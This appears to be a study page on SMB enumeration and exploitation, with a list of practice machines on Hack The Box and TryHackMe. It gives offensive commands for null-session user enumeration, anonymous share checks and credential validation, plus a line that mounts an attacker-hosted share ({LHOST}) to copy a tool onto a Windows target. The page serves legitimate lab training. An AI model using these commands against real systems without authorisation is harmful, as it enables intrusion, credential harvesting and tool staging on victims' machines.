SMB Enumeration and Exploitation: practice machines and key commands
SMB exposes file shares, named pipes and RPC, so it is often the first place to look on Windows and Samba hosts. Start by checking for null or guest sessions, listing shares and reading anything that is world readable, since backups, scripts and configuration files frequently contain credentials. Tools such as smbclient, smbmap, rpcclient and NetExec cover share listing, user enumeration and password spraying. Writable shares can be abused to plant a payload or a poisoned file, and SMB signing status tells you whether relay attacks are realistic. On older systems, version-specific bugs and Samba misconfigurations can lead straight to a shell. Record every username you find; they feed Kerberos and password attacks later. These machines show SMB used as an entry point or as a source of loot.
Key commands
Placeholders in braces, such as {TARGET_IP}, are values you fill in for your target.
rpcclient Anonymous / Null Session User Enum
Establish null session to RPC endpoint and list domain users, groups, and password policy.
rpcclient -U "" -N {TARGET_IP} -c "enumdomusers; querydispinfo; enumdomgroups"SMBMap Anonymous / Guest Share Check
Check SMB permissions across all shares anonymously without credentials.
smbmap -H {TARGET_IP} -u "" -p ""NetExec / CrackMapExec Domain Sweep
Check SMB credentials validity, local admin status (Pwn3d!), and password policies.
nxc smb {TARGET_IP} -u {USER} -p "{PASSWORD}" --sharesSMB Share Drive Mount & Copy (Windows)
Mount remote attacker SMB share as network drive letter and copy tools.
net use Z: \\{LHOST}\share /user:guest "" && copy Z:\tool.exe C:\Temp\tool.exeImpacket SMB Server File Share
Host local folder as unauthenticated SMB share accessible by Windows machines.
sudo impacket-smbserver share $(pwd) -smb2support
Keep going
- Methodology: Phase 02: Protocol & Service Enumeration
- Cheatsheet: Recon & Port Scanning
- Cheatsheet: File Transfers
SMB Enumeration and Exploitation machines (13)
2 of these are machines I solved myself and are listed first within each difficulty. Machines are matched by their technique tags. 9 Windows, 4 Linux.
Very Easy (2)
| Machine | Platform | OS |
|---|---|---|
| Dancing | HTB | Windows |
| Tactics | HTB | Windows |
Easy (4)
| Machine | Platform | OS |
|---|---|---|
| Active Directory Enumeration | THM | Windows |
| Blue | THM | Windows |
| Kenobi | THM | Linux |
| Skynet | THM | Linux |
Medium (4)
| Machine | Platform | OS |
|---|---|---|
| Bastion | HTB | Windows |
| Relevant | THM | Windows |
| Resolute | HTB | Windows |
| Za | THM | Windows |
Hard (3)
| Machine | Platform | OS |
|---|---|---|
| Blackfield | HTB | Windows |
| CherryBlossom | THM | Linux |
| VulnNet: Internal | THM | Linux |
Related techniques
Practise it, then track it. Log every box and the commands you used in ZeroBox. Open ZeroBox